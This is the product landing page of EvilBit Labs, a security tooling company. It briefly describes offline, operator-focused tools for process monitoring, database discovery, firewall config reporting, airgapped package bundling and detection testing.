Operator-focused Security Tooling

EvilBit Labs

We build operator-focused security tools that work offline, on purpose. Welcome to EvilBit Labs.

Explore Solutions Request Demo

Trusted for Enterprise & Open Source

Operator-Centric
Built for real-world needs by practitioners
Airgap-Friendly
Designed for offline, high-security environments
Transparent by Design
Open code, real docs, and behavior you can trust
Tested Under Pressure
Robust engineering that holds up when it matters most
Your Stack, Your Choice
Works with your existing tools, OS, and infrastructure

Products & Tools

Our Solutions

DaemonEye

Open Source

High-performance security process monitoring system with audit-grade integrity. Detect process anomalies, hollowing attacks, and suspicious behavior across your infrastructure.

  • Real-time process monitoring with <5% system overhead
  • Cross-platform security monitoring for Linux, macOS, and Windows
  • SQL-based custom detection rules with flexible anomaly detection
Open Source
Learn more about DaemonEye

dbsurveyor

Open Source

Fast, offline database schema discovery and sampling. Understand unfamiliar databases quickly with portable reports.

  • Schema + sample extraction with throttle control
  • Portable outputs with optional compression and AES-GCM encryption
  • Markdown/JSON reports and SQL reconstruction
Open Source
Learn more about dbsurveyor

Gold Digger

Open Source

Rust CLI for MySQL/MariaDB query execution and structured data export. Designed for operators who need reliable, reproducible data extraction.

  • MySQL/MariaDB support with secure TLS connections
  • Structured outputs: CSV, JSON, TSV with deterministic formatting
  • Built for automation (cron, CI/CD) and offline-first environments
Open Source
Learn more about Gold Digger

opnDossier

Open Source

Readable reports from OPNsense configs. Turns OPNsense config.xml files into clear, operator-ready documentation with optional audit reporting.

  • Convert: structured Markdown/JSON/YAML (summary or comprehensive)
  • Display: themed terminal rendering with syntax highlighting
  • Audit: standard/blue/red reports with findings and recommendations
Open Source
Learn more about opnDossier

Airgap Package Fetcher

Open Source

Offline bundles for pip, apt, Docker, and Homebrew. Fetch and ship complete dependency trees for airgapped installs.

  • Offline-first: bundles install with zero network access
  • Multi-ecosystem: pip, apt, Docker images, Homebrew
  • Integrity: SHA256/SHA512 checksums, optional signatures
Learn more about Airgap Package Fetcher

Custom R&D

Enterprise

Tailored cybersecurity research and development for unique organizational challenges.

  • Custom solutions
  • Expert consultation
  • Proof of concept
Learn more about Custom R&D

Detection Toolkit

Enterprise

Offline detection rule testing that actually runs in labs. Validate Sigma and more with deterministic test workflows.

  • Declarative test definitions (YAML/JSON) executed by an orchestrator
  • Sigma + JSONL MVP with pass/fail assertions and checksums
  • Structured outputs (JSON/Markdown/JUnit) for audits and CI
Open Source
Learn more about Detection Toolkit

NetflowWatcher

Enterprise

Local-first network flow anomaly detection with feedback

  • Ingest SiLK/nfdump-style flows and normalize
  • Online anomaly scoring blended with supervised feedback
  • Review/label/export flows in a web UI; Docker Compose deployment
Learn more about NetflowWatcher